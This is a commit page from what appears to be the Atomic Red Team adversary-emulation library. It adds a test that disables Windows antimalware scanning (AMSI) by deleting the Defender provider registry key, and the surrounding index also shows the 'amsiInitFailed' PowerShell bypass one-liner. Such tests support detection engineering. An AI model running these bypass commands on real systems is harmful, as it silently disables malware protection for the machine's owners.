security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-09-17 19:17:51 +00:00
parent a969a01805
commit 7f35271b8e
4 changed files with 40 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1089/T1089.md
+23
View File
@@ -26,6 +26,8 @@
- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
<br/>
@@ -260,3 +262,24 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
```
<br/>
<br/>
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands:
```
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
<br/>
atomics/index.md
+1
View File
@@ -194,6 +194,7 @@
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/index.yaml
+15
View File
@@ -6010,6 +6010,21 @@ defense-evasion:
elevation_required: false
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: "With administrative rights, an adversary can remove the AMSI Provider
registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
test removes the Windows Defender provider registry key. \n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
'
cleanup_command: New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
T1107:
technique:
external_references:
atomics/windows-index.md
+1
View File
@@ -38,6 +38,7 @@
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)